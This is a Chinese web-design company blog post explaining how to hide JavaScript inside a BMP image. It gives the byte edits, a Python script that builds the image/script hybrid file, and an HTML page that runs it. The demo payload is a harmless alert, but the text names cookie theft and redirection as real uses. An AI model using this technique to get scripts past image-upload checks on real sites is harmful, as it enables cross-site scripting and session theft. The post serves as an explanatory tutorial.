网络建站知识

精准传达 • 价值共享

洞悉互联网前沿资讯,探寻网站营销规律

网站建设 > 网站建设 > 网络建站知识

查看其它板块

图片文件黑客攻击原理

作者:狐灵科技 | 2020-01-12 17:30 |点击:

这里以位图 BMP 为例演示图片文件黑客攻击的原理及实现。

 

创建位图

创建或者随便找一个位图,使用编辑器(本文使用 UltraEdit 作为编辑查看工具)打开,可看到 16进制数。

BMP 格式中,前 2 字节是用于识别位图文件格式的字段,可以看到它对应 ASCII 码的 BM只要该字段正确,图片文件就能被正确识别处理,而无论其余数据是否损坏。随后 4 字节用于指示文件大小,单位为字节。

灵梦.bmp

灵梦.bmp

 

 

插入脚本

在此基础上,我们就可以对图片动一些手脚了,我们可以在图片中插入一段 JS 脚本。

比如获取该网页cookie的脚本或者重定向到目标网站的脚本。这里我们仅作效果演示,所以用了弹框:

window.onload = alert("Image hacked!");
 
JavaScript

然后我们将脚本插入到图片中,具体步骤如下:

  1. 2A 2F(即 JS 多行注释中*/的十六进制码)替换为00 00,防止语法错误干扰脚本运行
  2. 在图片的前两个字节后插入2F 2A( JS 多行注释中/*的十六进制码)
  3. 在图片末尾插入FF 2A 2F 3D 31 3B(即*/=1;),其中=1;用于结束开头的BM
  4. 在图片最后插入你写好的脚本的十六进制码。

 

2
2
2
4
4
4

 

以上操作可以通过 Python 脚本简单实现:

# -*- coding:utf-8 -*-

src_img_name = '灵梦.bmp'
rst_img_name = 'hackimg.bmp'
append_js_name = 'cookies.js'

with open(src_img_name,'rb') as f:
    buff = f.read()
    buff = buff.replace(b'\x2A\x2F',b'\x00\x00')

with open(rst_img_name,'wb') as f:
    f.write(buff)
    f.seek(2)
    f.write(b'\x2F\x2A')
    f.seek(0,2)
    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
    f.write(open(append_js_name,'rb').read())
 
Python

最后我们得到插入了恶意代码的位图文件:
hackimg.bmp

hackimg.bmp

 

 

浏览器运行

创建index.html文件,内容如下:

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>图片黑客攻击</title>
</head>
<body>
    <img src="hackimg.bmp" alt="博丽灵梦"><!-- 这里我们看到图片还能正常显示 -->
    <script src="hackimg.bmp"></script><!-- 脚本也成功执行了 -->
</body>
</html>
 
HTML

运行效果如下:
15778547433291.png

15778547433291.png

 

其他图片格式也可以通过类似的操作实现。

 
如没特殊注明,文章均为狐灵科技原创,转载请注明   "图片文件黑客攻击原理
相关推荐
返回首页 了解更多建站资讯

—— 微信公众号 ——

热门标签

上一篇———————

禁止Html5在手机上屏幕页面缩放

下一篇———————

有效解决百度编辑器复制粘贴把div Clss等标签过滤
多一份免费策划方案,总有益处。

请直接添加技术总监微信联系咨询

立即询问 技术总监在线 15523356218
网站设计 品牌营销

多一份参考,总有益处

联系狐灵科技,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

业务热线:15082661954 / 大客户专线:15523356218

在线咨询 在线咨询 提交需求

关于狐灵科技

+

狐灵致力于互联网品牌建设与网络营销,专业领域包括 网站建设 SEO优化、移动互联网营销、高端网站建设、高端网站设计、品牌网站定制开发、营销策划推广电子商务、移动互联网营销、 为不同类型的客户提供良好的互联网应用定制解决方案,我们将策略和执行紧密结合,且不断评估并优化我们的方案,为客户提供一体化全方位的互联网品牌整合方案!

我们的优势

量身打造个性化网站制作

代码深度符合SEO优化

一站式企业网站建设服务

前沿视觉设计、研发能力

重庆网站建设公司

多项网站设计传播大奖

营销型网站建设专家

自主研发网站管理系统

B2C电商网站建设供应商

完善的售后服务体系

我们的不同

+

在我们的对手消耗大量的时间停留在碎片化的互联网设计或者程序实现的时候,我们已经开始把数字化品牌建设和网络传播进行了整合。我们提供从前期的网站品牌分析策划、网站设计、创意表现、系统开发以及后续网站运营反馈建议等一系列服务,帮助企业打造创新的互联网品牌经营模式与有效的网络营销方法,为所有谋求长远发展的企业品牌贡献全力!

友情链接 交换友情链接 交换友情链接 展开

公司地址:重庆市九龙坡杨家坪重百大楼21-8 | 业务热线:15082661954

Copyright © 2017-2020 Fox spirit Network. 狐灵科技 版权所有 | 渝ICP备19005721号-1

专业团队为您提供 重庆网页设计, 品牌网站设计,营销型网站制作,SEO优化关键词排名推广等服务,建网站就找狐灵科技! | TAG标签 | 网站建设地图 | 网站地图

业务咨询 业务咨询 业务热线 15082661954 提交需求 官方微信 狐灵网络科技官方微信